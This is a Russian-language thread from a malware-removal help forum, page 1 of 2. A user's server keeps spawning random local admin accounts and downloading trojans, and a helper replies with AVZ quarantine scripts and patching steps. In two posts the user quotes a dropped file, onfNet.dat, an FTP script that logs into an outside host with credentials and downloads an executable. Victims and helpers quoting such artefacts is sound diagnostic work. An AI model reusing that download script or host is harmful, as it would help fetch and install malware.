Страница 1 из 2 12 Последняя
Показано с 1 по 20 из 28.

периодически создает пользователей с правами админа и тянет из сети троянцев KIS не видит (заявка № 120331)

  1. #1
    Junior Member Репутация
    Регистрация
    16.05.2012
    Сообщений
    19
    Вес репутации
    17

    периодически создает пользователей с правами админа и тянет из сети троянцев KIS не видит

    Добрый День!

    с Месяц назад - KIS стал обнаруживать троянцев, и после успешного лечения, троянцы появлялись снова, но уже с новыми названиями / модификациями.
    Периодически (не пойму по какому событию) создается пользователь со случайным именем и правами локального Админа! при этом в документ энд сеттинг, иногда создается папка этого пользователя, как будто он уже входил на сервер по терминальной сессии
    Пробовал откатится с помощью Acronis на 2 месяца назад с восстановлением свежих профилей пользователей - вирусная активность опять проявилась
    Пробовал Cureit и Kavtool - периодически ловят вирусы / троянцы, но со временем опять появляются выше описанные симптомы. Вероятно чтото остается в системе

    Зараннее благодарны за Вас труд и помощь!!
    логи прилагаю :
    virusinfo_syscheck.zip
    hijackthis.log

  2. Реклама
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,267
    Вес репутации
    326
    Уважаемый(ая) marcha12, спасибо за обращение на наш форум!

    Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.

    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Techno
    Регистрация
    25.08.2009
    Адрес
    Россия
    Сообщений
    10,961
    Вес репутации
    379
    C:\Documents and Settings\All Users\Главное меню\Программы\Автозагрузка\killTemp.cmd - Ваше?


    - Сделайте лог полного сканирования MBAM.

  5. #4
    Junior Member Репутация
    Регистрация
    16.05.2012
    Сообщений
    19
    Вес репутации
    17
    Спасибо, что откликнулись! Да killTemp.cmd мое - темпы чистил у юзеров. я его сегодня удалил...
    также удалил явно "левые" файлы, которые рождает вирус, названия на скриншоте , сам архив могу выслать...

    скрин списка ви&#1.jpg

    лог полного сканирования MBAM. - делаю и выложу

    еще раз спасибо!

  6. #5
    Junior Member Репутация
    Регистрация
    16.05.2012
    Сообщений
    19
    Вес репутации
    17

  7. #6
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Techno
    Регистрация
    25.08.2009
    Адрес
    Россия
    Сообщений
    10,961
    Вес репутации
    379
    Файлы такого вида в папке system32 есть? C:\WINDOWS\system32\18.exe

    Повторите лог virusinfo_syscheck.zip


    - Выполните в AVZ скрипт из файла ScanVuln.txt
    - Откройте файл avz_log.txt из под-папки LOG.
    - Пройдитесь по ссылкам из файла avz_log.txt и установите важные обновления.
    - Перезагрузите компьютер.
    - Повторите выполнение скрипта, чтобы убедиться, что уязвимости устранены.

  8. #7
    Junior Member Репутация
    Регистрация
    16.05.2012
    Сообщений
    19
    Вес репутации
    17
    Спасибо! да есть 18.exe

    пробую отпишусь....

  9. #8
    Junior Member Репутация
    Регистрация
    16.05.2012
    Сообщений
    19
    Вес репутации
    17
    virusinfo_syscure.zip

    выполнил , пофиксил уязвисостей теперь нет...

    что дальше? Система чиста?

  10. #9
    Junior Member Репутация
    Регистрация
    16.05.2012
    Сообщений
    19
    Вес репутации
    17
    Спасибо! но пока система не чиста, т.к. сегодня появился новая учетка с админ правами

  11. #10
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Techno
    Регистрация
    25.08.2009
    Адрес
    Россия
    Сообщений
    10,961
    Вес репутации
    379
    - Выполните в АВЗ:
    Код:
    begin
     QuarantineFile('C:\WINDOWS\system32\18.exe','');
     DeleteFile('C:\WINDOWS\system32\18.exe');
    ExecuteSysClean;
    end.
    Перезагрузите компьютер

    После перезагрузки:
    - Выполните в АВЗ:
    Код:
    begin
     CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
    end.
    Файл quarantine.zip из папки AVZ загрузите по ссылке "Прислать запрошенный карантин" вверху темы.

    - Повторите все логи.

  12. #11
    Junior Member Репутация
    Регистрация
    16.05.2012
    Сообщений
    19
    Вес репутации
    17
    Выполнил Ваши указания ....
    Заметил особенность , что прочие появляющиеся файлы удаляет регулярно KIS, но не все , но они снова появлюятся с уже другими названиями и сегодня опять появился пользователь с случайным именем "1991212"...
    kis не видит вируса в файле C:\WINDOWS\system32\hex158477567.exe и в файле onfNet.dat из этой же директории с текстом:
    open jzqa.3322.org
    comex
    comex
    get Net.exe onNet.exe
    bye

  13. #12

  14. #13
    Junior Member Репутация
    Регистрация
    16.05.2012
    Сообщений
    19
    Вес репутации
    17
    Файл quarantine.zip - пустой получился...

    Добавлено через 5 минут

    по пути C:\WINDOWS\system32 появиляется файл onfNet.dat с содержанием:
    open jzqa.3322.org
    comex
    comex
    get Net.exe onNet.exe
    bye
    Последний раз редактировалось marcha12; 20.05.2012 в 10:49. Причина: Добавлено

  15. #14
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Techno
    Регистрация
    25.08.2009
    Адрес
    Россия
    Сообщений
    10,961
    Вес репутации
    379
    MBAM еще раз сделайте.

    Уязвимости закрыли?

  16. #15
    Junior Member Репутация
    Регистрация
    16.05.2012
    Сообщений
    19
    Вес репутации
    17

  17. #16
    Junior Member Репутация
    Регистрация
    16.05.2012
    Сообщений
    19
    Вес репутации
    17
    да - скачал, установил заплатки поссылкам, заново запустил скрипт - написало -уязвимостей нет

  18. #17
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Techno
    Регистрация
    25.08.2009
    Адрес
    Россия
    Сообщений
    10,961
    Вес репутации
    379
    Что с проблемой?

  19. #18
    Junior Member Репутация
    Регистрация
    16.05.2012
    Сообщений
    19
    Вес репутации
    17
    актуальна более того тянет чтото с инета malware заблокировал win32.exe

    Добавлено через 49 секунд

    кис за сегодня прибил 40 троянских программ

    Добавлено через 3 минуты

    кис за сегодня прибил 40 троянских программ в карантине malware положил файл zysvchost.exe из C:\RECYCLER

    Добавлено через 58 секунд

    вот сильную заразу подхватил - вывести не можем
    что посоветуете?
    Последний раз редактировалось marcha12; 20.05.2012 в 14:40. Причина: Добавлено

  20. #19
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Techno
    Регистрация
    25.08.2009
    Адрес
    Россия
    Сообщений
    10,961
    Вес репутации
    379
    Давайте с LiveCD попробуем http://virusinfo.info/showthread.php?t=15927

  21. #20
    Junior Member Репутация
    Регистрация
    16.05.2012
    Сообщений
    19
    Вес репутации
    17
    Спасибо!
    F-secure - находит чтото но не может удалить жаль не вижу что находит... пробуес как Вы советуете LiveCD, это завтра т.к. сегодня с дому удаленно работаю...

  • Уважаемый(ая) marcha12, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:


    Надеемся больше никогда не увидеть ваш компьютер зараженным!

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.
  • Присоединяйтесь к нам в соцсетях!

    Мы делаем все возможное, чтобы помогать людям в защите и лечении компьютеров.

    Страница 1 из 2 12 Последняя

    Похожие темы

    1. Ответов: 2
      Последнее сообщение: 23.03.2012, 13:03
    2. Блокировка пользователей с правами администратора. (заявка №23733)
      От CyberHelper в разделе Отчеты сервиса лечения VirusInfo
      Ответов: 2
      Последнее сообщение: 23.06.2010, 12:00
    3. Ответов: 4
      Последнее сообщение: 12.01.2010, 18:47
    4. Ответов: 5
      Последнее сообщение: 22.02.2009, 07:01
    5. Если роутер без пароля для админа, чем это черевато?
      От meedzher в разделе Общая сетевая безопасность
      Ответов: 8
      Последнее сообщение: 13.01.2009, 13:40

    Метки для этой темы

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.01579 seconds with 21 queries